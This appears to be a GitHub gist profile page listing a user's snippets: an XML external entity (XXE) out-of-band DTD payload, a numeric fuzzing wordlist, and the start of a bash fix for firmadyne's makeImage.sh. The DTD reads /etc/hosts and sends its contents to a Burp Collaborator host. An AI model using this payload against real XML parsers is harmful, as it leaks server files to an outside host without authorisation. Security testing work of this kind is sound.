Skip to content

Instantly share code, notes, and snippets.

View c0mix's full-sized avatar

Lorenzo Comi c0mix

View GitHub Profile
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://0detwan70owlzbhvtrwh5625lwrqff.burpcollaborator.net/?%file;'>">
%all;
%send;
0
00
01
02
03
04
05
06
07
08
@c0mix
c0mix / makeImage.sh
Last active September 17, 2018 10:29
a simple fix for firmadyne makeImage.sh script
#!/bin/bash
set -e
set -u
if [ -e ./firmadyne.config ]; then
source ./firmadyne.config
elif [ -e ../firmadyne.config ]; then
source ../firmadyne.config
else